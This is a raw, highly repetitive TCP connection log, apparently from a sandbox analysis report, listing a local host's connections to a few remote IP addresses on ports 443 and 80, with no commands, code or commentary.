          Source: global trafficTCP traffic: 192.168.2.4:49755 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49755 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49755 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49757 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49757 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49757 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49757 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49757 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49757 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49759 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49759 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49759 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49759 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49759 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49759 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49762 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49762 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49762 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49762 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49762 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49762 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49764 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49764 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49764 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49764 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49764 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49764 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49768 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49768 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49768 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49768 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49768 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49768 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49771 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49771 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49771 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49771 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49771 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49771 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49775 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49775 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49775 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49776 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49776 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49776 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49775 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49776 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49775 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49775 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49778 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49778 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49778 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49776 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49776 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49778 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49778 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49778 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49780 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49780 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49780 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49778 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49778 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49780 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49780 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49780 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49783 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49783 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49783 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49783 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49783 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49783 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49788 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49788 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49788 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49789 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49789 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49789 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49788 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49788 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49788 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49789 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49789 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49789 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49789 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49789 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49789 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49791 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49791 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49791 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49792 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49792 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49792 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49792 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49791 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49792 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49792 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49791 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49791 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49795 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49795 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49795 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49795 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49795 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49795 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49798 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49798 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49798 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49798 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49799 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49799 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49799 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49798 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49798 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49799 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49799 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49799 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49802 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49802 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49802 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49802 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49802 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49802 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49804 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49804 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49804 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49804 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49804 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49804 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49805 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49805 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49805 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49805 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49805 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49805 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49805 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49805 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49806 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49806 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49806 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49806 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49806 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49806 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49808 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49808 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49808 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49808 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49808 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49808 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49811 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49811 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49811 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49811 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49811 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49811 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49814 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49814 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49814 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49814 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49814 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49814 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49816 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49816 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49816 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49816 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49816 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49816 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49818 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49818 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49818 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49818 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49818 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49818 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49818 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49818 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
